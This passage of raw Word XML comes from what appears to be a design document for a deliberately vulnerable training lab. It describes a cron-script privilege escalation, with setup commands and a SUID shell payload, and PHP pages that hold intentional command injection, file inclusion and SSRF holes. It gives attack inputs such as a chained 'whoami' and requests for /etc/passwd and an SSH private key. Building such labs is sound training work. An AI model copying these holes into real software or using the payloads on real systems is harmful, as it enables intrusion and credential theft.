        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61E50D9D" w14:textId="39721E6C" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="003F32CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This configuration enables container escape scenarios where user stocznia can mount /home/sopot to access SSH keys and credentials, demonstrating that partial security controls often fail against determined attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590323BE" w14:textId="27323520" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc223521117"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.4.6 Cron Job Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="7CB60933" w14:textId="7AD0933C" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00EA3D53">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>A root-executed backup script has incorrect group permissions, creating the final privilege escalation path to root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529BD873" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Script Location: </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/opt/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C8A9D2" w14:textId="4E136FC3" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-rwxrwx--x 1 root admins 62 Sep 29 17:04 /opt/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F0845D" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Configuration Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0E2D3" w14:textId="32AC3628" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00961685">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo groupadd </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admins</w:t>
      </w:r>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo usermod -aG admins </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sopot</w:t>
      </w:r>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo chown </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root:admins</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/opt/backup.sh</w:t>
      </w:r>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo chmod 771 /opt/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2A32A" w14:textId="1DE993FB" w:rsidR="00A6587D" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00317F9F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The admins group has </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions on a root-owned script. User sopot can modify the script to inject malicious code that executes with root privileges via cron, completing the privilege escalation chain. Example payloads include creating SUID bash shells </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(chmod 4755 /tmp/rootbash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>) or installing SSH keys in root's authorized_keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6356671C" w14:textId="7EF3D86C" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc223521118"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.4.7 ServerMeta Web Application Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="1F2CA31C" w14:textId="1A3BB453" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="00EA3D53">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ServerMeta (Subnet 3) hosts a PHP application with multiple critical web vulnerabilities, enabling network pivoting and lateral movement to Subnet 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58126104" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Injection - DNS Lookup Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5594A7" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: nslookup.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C580195" w14:textId="77777777"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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFAEA08" w14:textId="44DFEBA4" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="00961685">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isset($_GET['host'])) {host = $_GET['host'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70F135DB" w14:textId="77777777"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 xml:space="preserve">        $output = shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exec(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"nslookup </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$host); // Direct injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8E1C14" w14:textId="79FF05BF" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="00961685">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "&lt;pre&gt;$output&lt;/pre&gt;";}?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA87DD" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Command chaining (e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host=google.com;whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>) enables remote code execution and reverse shell establishment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12239997" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC7F145" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: file_viewer.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CE220" w14:textId="77777777"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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB1262" w14:textId="1420F6AF"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 xml:space="preserve">    if (isset($_GET['file'])) {$file = $_GET['file']; @readfile($file); // Reads any accessible </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>file }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E38652" w14:textId="0071E04D" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="00AC2949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Path traversal (</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?file</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=../../../..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, ?file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=/home/sopot/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>) for credential harvesting and SSH key theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCBD9C4" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="00D77DFE" w:rsidRDefault="000F00D6" w:rsidP="000F00D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4ED185" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="009025BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url_fetch.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C087316" w14:textId="77777777" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="009025BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F00A71" w14:textId="262745A0" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="009025BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isset($_GET['url'])) {$url = $_GET['url']; $response = @file_get_contents($url); // No validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36808EAC" w14:textId="22CE59A3" w:rsidR="000F00D6" w:rsidRPr="009025BF" w:rsidRDefault="000F00D6" w:rsidP="009025BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "&lt;pre&gt;</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htmlspecialchars($response</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"&lt;/pre&gt;";}?&gt;</w:t>
      </w:r>
